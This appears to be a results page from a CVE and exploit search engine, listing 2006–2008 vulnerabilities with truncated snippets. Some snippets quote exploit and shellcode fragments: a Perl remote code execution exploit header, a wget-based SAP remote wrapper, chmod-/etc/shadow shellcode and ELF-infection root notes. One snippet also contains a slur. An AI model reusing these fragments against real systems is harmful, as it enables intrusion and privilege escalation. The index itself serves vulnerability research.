CVE Search Engine - Security Vulnerabilities and Exploits Search Tool

seebug.org•added 2008/02/01 12:0 a.m.•23 views

LightBlog 9.5 cp_upload_image.php Remote File Upload Vulnerability

No description provided by source. LightBlog 9.5 - REMOTE FILE UPLOAD VULNERABILITY by Omni 1 Infos --------- Date : 2008-01-30 Product : LightBlog Version : v 9.5 Vendor : http://www.publicwarehouse.co.uk/ Vendor Status : 2008-01-31 Informed! 2008-01-31 Patch received from vendor! 2008-02-01...

UbuntuCve•added 2007/10/17 7:17 p.m.•31 views

CVE-2007-5491

Directory traversal vulnerability in the translation module translator.php in SiteBar 3.3.8 allows remote authenticated users to chmod arbitrary files to 0777 via ".." sequences in the lang parameter...

9CVSS6.1AI score0.02341EPSS

Exploits1References1

Prion•added 2007/10/17 7:17 p.m.•22 views

Directory traversal

9CVSS6.3AI score0.02341EPSS

Exploits1References8Affected Software1

CVE•added 2007/10/17 7:0 p.m.•57 views

CVE-2007-5491

Summary of CVE-2007-5491 family in SiteBar : The translation module (translator.php) in SiteBar 3.3.8 is vulnerable to a directory traversal attack via the lang parameter (using .. sequences), allowing remote authenticated users to chmod arbitrary files to 0777. Related entries (CVE-2007-5492, CV...

9CVSS6AI score0.02341EPSS

Exploits1References8Affected Software1

myhack58•added 2007/04/26 12:0 a.m.•11 views

Analysis of the server-u site chmod vulnerability-vulnerability warning-the black bar safety net

author:wujianqiang 18/2/2004 email :[email protected] homepage:http://wujianqiang. 5 3 3. net Q:groomer when? A:Play exp... In fact, this procedure is not difficult, is the shellcode requires a little bit of trouble; Start dimming from each command to start the tone, the trouble might ...

0.2AI score

exploitpack•added 2007/04/17 12:0 a.m.•17 views

ShoutPro 1.5.2 - shout.php Remote Code Injection

ShoutPro 1.5.2 - shout.php Remote Code Injection ?php echo "\n"; echo " Special Greetings To - Timq,Warpboy,The-Maggot \n"; echo "\n\n\n"; //Writes Files - Under 100 bytes to meet requirements $temppayload = "...

0.2AI score

exploitpack•added 2007/04/12 12:0 a.m.•11 views

Chatness 2.5.3 - options.phpsave.php Remote Code Execution

Chatness 2.5.3 - options.phpsave.php Remote Code Execution ?/ Files: options.php, save.php Affects: Chatness = 2.5.3 Date: 12th April 2007 Issue Description: =========================================================================== Chatness suffers with two main vulnerabilities, the first of...

0.6AI score

Exploit DB•added 2007/04/12 12:0 a.m.•33 views

Chatness 2.5.3 - '/options.php/save.php' Remote Code Execution

?/ Files: options.php, save.php Affects: Chatness = 2.5.3 Date: 12th April 2007 Issue Description: =========================================================================== Chatness suffers with two main vulnerabilities, the first of these in /admin/options.php the problems occur because the...

Exploit DB•added 2007/03/05 12:0 a.m.•27 views

Linux Kernel 2.6.17 - 'Sys_Tee' Local Privilege Escalation

source: https://www.securityfocus.com/bid/22823/info The Linux kernel is prone to a local privilege-escalation vulnerability. Exploiting this issue allows local attackers to gain superuser privileges, facilitating the complete compromise of affected computers. Linux 2.6.16 - 2.6.17.6 local root...

Exploit DB•added 2007/02/28 12:0 a.m.•36 views

McAfee VirusScan for Mac (Virex) 7.7 - Local Privilege Escalation

!/usr/bin/perl http://www.digitalmunition.com written by kf kflistsatdigitalmunitiondotcom Following symlinks is bad mmmmmmmmmmkay! $dest = "/var/cron/tabs/root"; $tgts"0" = "Virex 7.7.dmg:"/Library/Application Support/Virex/VShieldExclude.txt" "; unless $target = @ARGV print "\n\nUsage: $0...

seebug.org•added 2006/12/27 12:0 a.m.•24 views

PHP-Update <= 2.7 (admin/uploads.php) Remote Code Execution Exploit

No description provided by source. !/usr/bin/perl rgod u fucking little piece of shit faggot. way to ruin a private exploit, scumbag use strict; use IO::Socket; use MIME::Base64; use Getopt::Std; my $app = "PHP-Update 2.7"; my $type = "Remote Code Execution"; my $author = "undefined1"; my $date =...

seebug.org•added 2006/11/18 12:0 a.m.•15 views

linux/x86 chmod 0666 /etc/shadow 36 bytes

No description provided by source. / By Kris Katterjohn 8/29/2006 36 byte shellcode to chmod"/etc/shadow", 0666 and exit for Linux/x86 To remove exit: Remove the last 5 bytes 0x6a - 0x80 section .text global start start: xor edx, edx push byte 15 pop eax push edx push byte 0x77 push word 0x6f64...

0day.today•added 2006/11/17 12:0 a.m.•44 views

linux/x86 chmod 0666 /etc/shadow 36 bytes

Exploit for linux/x86 platform in category shellcode ========================================= linux/x86 chmod 0666 /etc/shadow 36 bytes ========================================= / By Kris Katterjohn 8/29/2006 36 byte shellcode to chmod"/etc/shadow", 0666 and exit for Linux/x86 To remove exit:...

7AI score

Exploit DB•added 2006/11/17 12:0 a.m.•32 views

linux/x86 - chmod 0666 /etc/shadow 36 bytes

linux/x86 chmod 0666 /etc/shadow 36 bytes. Shellcode exploit for linx86 platform / By Kris Katterjohn 8/29/2006 36 byte shellcode to chmod"/etc/shadow", 0666 and exit for Linux/x86 To remove exit: Remove the last 5 bytes 0x6a - 0x80 section .text global start start: xor edx, edx push byte 15 pop...

Packet Storm•added 2006/11/14 12:0 a.m.•25 views

r3mote_unix_wrapper.sh.txt

!/bin/sh Variables Ultra short URL where is located our additional code Max length : 8 chars SRC="zz.1.vg" Filename of the downloaded file Max length : 6 chars because of "-O" in wget FILE="./..." Target SAP server IP No restriction ;- TARGET="192.168.201.11" Set to /bin/echo to debug DEBUG="" So...

seebug.org•added 2006/10/28 12:0 a.m.•21 views

GLIBC (via /bin/su) Local Root Exploit

No description provided by source. / Working exploit for glibc executing /bin/su To exploit this i have used a technique that overwrites the .dtors section of /bin/su program with the address of the shellcode, so, the program executes it when main returns or exit is called Thanks a lot to rwxrwxr...

seebug.org•added 2006/10/27 12:0 a.m.•29 views

Infecting Elf Binaries to Gain Local Root Exploit

No description provided by source. gcc infR3.s -o infR3 strip infR3 find a writable binary example: ls ./infR3 /bin/ls when root calls the writable ls, chmod will be setuided Coded by [email protected] == [email protected] .text .global main infeccion de start para conseguir local root use ...